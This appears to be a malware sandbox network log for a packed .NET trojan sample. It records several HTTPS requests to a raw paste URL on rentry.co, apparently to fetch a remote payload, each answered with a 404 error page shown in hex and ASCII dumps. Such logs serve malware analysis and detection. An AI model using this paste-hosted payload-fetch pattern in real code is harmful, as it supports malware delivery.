                                                                                        2024-10-18 10:43:44 UTC717INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:44 UTC1369INData Raw: 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                        Data Ascii: operty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property
                                                                                        2024-10-18 10:43:44 UTC1369INData Raw: 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                        Data Ascii: pt.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div
                                                                                        2024-10-18 10:43:44 UTC1005INData Raw: 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 64 38 32 63 65 35 65 39 61 64 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 79 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d
                                                                                        Data Ascii: .min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edd82ce5e9ad',t:'MTcyOTI0ODIyNC4wMDAwMDA='}
                                                                                        2024-10-18 10:43:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        53192.168.2.660706104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:45 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:45 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:45 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CAmX7%2FhY83MF1f%2BD2l2fAh7Zd5AdhGkxQZz0rIWi7VctqT3DUylG48aaUYwiLfccPqpYbSVKaQTUNhTQ%2F0emIyWFzY7Gfwri3fn9f1TbAYU5XuhQMMfGXrgSFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eddf28852cab-DFW
                                                                                        2024-10-18 10:43:45 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:45 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:43:45 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:45 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 64 66 32 38 38 35 32 63 61 62 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 79 4e 53 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eddf28852cab',t:'MTcyOTI0ODIyNS4wMDAwMD
                                                                                        2024-10-18 10:43:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        54192.168.2.660707104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:46 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:47 UTC675INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:47 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m6S2YJCEl5UeEBY35aKchEdL7LaAYAiERz%2FD4MqUKGzFrh05QinLuSqi6RgUvTE68KxvVmzQW6PYKHKuWAKc4SgUeOeBrF6sU0QytQF6LZ0pIPQePDhtNIdoEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ede90d183ab5-DFW
                                                                                        2024-10-18 10:43:47 UTC694INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:47 UTC1369INData Raw: 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e
                                                                                        Data Ascii: 2.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing.
                                                                                        2024-10-18 10:43:47 UTC1369INData Raw: 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d
                                                                                        Data Ascii: g' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-sm
                                                                                        2024-10-18 10:43:47 UTC1028INData Raw: 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 65 39 30 64 31 38 33 61 62 35 27 2c 74 3a 27 4d 54 63
                                                                                        Data Ascii: c="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ede90d183ab5',t:'MTc
                                                                                        2024-10-18 10:43:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        55192.168.2.660710104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:48 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:48 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:48 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLQnWZ3ZG84tGW1G7th3iu1tpjXeQFekMQTQb71j49cJwKHf561gCwGBb0ugB1o3P%2Bm7EDmr8kxvswJOKt5LH1QEjGqIBpxFgsptcAgcT%2BHjnIQ2Pgsn4BXTkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edf23b8c2cd8-DFW
                                                                                        2024-10-18 10:43:48 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:48 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:43:48 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:43:48 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 66 32 33 62 38 63 32 63 64 38 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 79 4f 43 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edf23b8c2cd8',t:'MTcyOTI0ODIyOC4wMDAwMDA=
                                                                                        2024-10-18 10:43:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        56192.168.2.660711104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:49 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:49 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:49 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sfp35yhuM%2BNwHFKlyjkzxqV88JLtNXrGu2moGJaKRsaA8PbXmIBHj4%2BlMIiR%2Bpw%2BFl2XYwrInf7KGTaHaFFPsZY6wWZZQnBcsTMN%2BY3%2BtXA3oCsBVPr4gVIwZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edf92d172cc3-DFW
